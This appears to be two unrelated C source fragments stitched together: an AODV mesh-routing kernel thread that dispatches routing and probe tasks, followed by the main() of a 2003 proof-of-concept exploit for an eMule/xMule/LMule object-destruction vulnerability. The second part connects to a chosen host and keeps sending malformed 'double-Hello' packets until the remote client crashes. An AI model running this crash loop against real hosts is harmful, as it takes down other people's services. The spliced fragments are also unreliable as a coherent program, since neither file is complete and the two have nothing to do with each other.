void aodv(void) { //The queue holding all the events to be dealt with task *tmp_task; //Initalize the variables init_waitqueue_head(&aodv_wait); atomic_set(&kill_thread, 0); atomic_set(&aodv_is_dead, 0); //Name our thread /*lock_kernel(); sprintk(current->comm, "aodv-mcc"); //exit_mm(current); --> equivale a: current->mm = NULL; //we are in a kthread? aren't we? unlock_kernel();*/ //add_wait_queue_exclusive(event_socket->sk->sleep,&(aodv_wait)); // add_wait_queue(&(aodv_wait),event_socket->sk->sleep); //why would I ever want to stop ? :) for (;;) { //should the thread exit? if (atomic_read(&kill_thread)) { goto exit; } //goto sleep until we recieve an interupt interruptible_sleep_on(&aodv_wait); //should the thread exit? if (atomic_read(&kill_thread)) { goto exit; } //While the buffer is not empty extern dtn_hello_ip; while ((tmp_task = get_task()) != NULL) { u_int32_t dst; //takes a different action depending on what type of event is recieved switch (tmp_task->type) { //remove following case when DTN hell test end case TASK_DTN_HELLO: //inet_aton("127.127.127.127",&dst); //extern u_int32_t dtn_hello_ip; gen_rreq(g_mesh_ip,dtn_hello_ip,tmp_task->tos); #ifdef CaiDebug printk("-------DTN HELLO TASK---------\n"); #endif //insert_timer_simple(TASK_DTN_HELLO, 300*HELLO_INTERVAL, g_mesh_ip); //update_timer_queue(); break; //RREP case TASK_RECV_RREP: recv_rrep(tmp_task); kfree(tmp_task->data); break; //RERR case TASK_RECV_RERR: //printk("-----------\nget RERR from %s----------\n",inet_ntoa(tmp_task->src_ip)); recv_rerr(tmp_task); kfree(tmp_task->data); break; case TASK_RECV_HELLO: //printk("get HELLO from %s\n",inet_ntoa(tmp_task->src_ip)); recv_hello(tmp_task); kfree(tmp_task->data); break; /****************添加接收到通路包的任务***************/ #ifdef RECOVERYPATH case TASK_RECV_RCVP: //printk("Receive a RCVP\n"); recv_rcvp(tmp_task); kfree(tmp_task->data); break; case TASK_RECV_RRDP: //printk("Receive a RRDP\n"); recv_rrdp(tmp_task); kfree(tmp_task->data); break; #endif //Cleanup the Route Table and Flood ID queue case TASK_CLEANUP: flush_aodv_route_table(); break; case TASK_HELLO: //printk("gen HELLO\n"); gen_hello(); break; case TASK_ST: gen_st_rreq(); break; case TASK_GW_CLEANUP: update_gw_lifetimes(); insert_timer_simple(TASK_GW_CLEANUP, ACTIVE_GWROUTE_TIMEOUT, g_mesh_ip); update_timer_queue(); break; case TASK_NEIGHBOR: //printk("get NEIGHBOR TASH,delete neigh %s\n",inet_ntoa(tmp_task->src_ip)); delete_aodv_neigh(tmp_task->src_ip); break; case TASK_ROUTE_CLEANUP: flush_aodv_route_table(); break; case TASK_SEND_ETT: send_probe(tmp_task->dst_ip); break; //A small probe packet is received case TASK_RECV_S_ETT: recv_sprobe(tmp_task); kfree(tmp_task->data); break; //A large probe packet is received case TASK_RECV_L_ETT: recv_lprobe(tmp_task); kfree(tmp_task->data); break; case TASK_ETT_CLEANUP: reset_ett(find_aodv_neigh(tmp_task->src_ip)); printk("Reseting ETT-Info from neighbour %s\n", inet_ntoa(tmp_task->src_ip)); break; case TASK_NEIGHBOR_2H: delete_aodv_neigh_2h(tmp_task->src_ip); break; case TASK_RECV_RREQ: recv_rreq(tmp_task); kfree(tmp_task->data); break; case TASK_RESEND_RREQ: resend_rreq(tmp_task); break; case TASK_ETT_INFO: recv_ett_info(tmp_task); kfree(tmp_task->data); break; case TASK_SEND_RREP: gen_rrep(tmp_task->src_ip, tmp_task->dst_ip, tmp_task->tos); break; case TASK_RECV_STRREQ: recv_rreq_st(tmp_task); kfree(tmp_task->data); break; case TASK_UPDATE_LOAD: update_my_load(); break; case TASK_GEN_RREQ: gen_rreq(tmp_task->src_ip, tmp_task->dst_ip, tmp_task->tos); break; default: break; } kfree(tmp_task); } } exit: //Set the flag that shows you are dead atomic_set(&aodv_is_dead, 1); }
int main (int argc, char *argv[]) { puts ("eMule/xMule/LMule AttachToAlreadyKnown() " "Object Destruction vulnerability\n" "proof of concept code\n" "Copyright (C) 2003 R?mi Denis-Courmont " "<*****@*****.**>\n"); if (argc < 2) return usage (argv[0]); else { int fd, count = 0; const char *host, *port; host = argv[1]; port = (argc < 3) ? "4662" : argv[2]; printf ("Connecting to [%s]:%s ...\n", host, port); while (++count && ((fd = socket_connect (host, port)) != -1)) { printf ("Sending double-Hello packet (%d)...\n", count); if (send_2hello (fd)) { perror ("Error"); count = -1; } puts ("Checking reply ..."); if (recv_hello (fd)) { fprintf (stderr, "%s: malformed reply\n", host); count = -1; } else if (recv_hello (fd)) printf ("%s might be vulnerable.\n", host); else { printf ("%s is not vulnerable.\n", host); count = -1; } close (fd); if (count >= MAXTRIES) { printf ("%s is still alive after %d deadly " "packets. Probably not vulnerable.\n", host, count); return 0; } } gai_perror (host); if (count) { puts ("Remote host seems to have crashed!"); return 0; } } return 1; }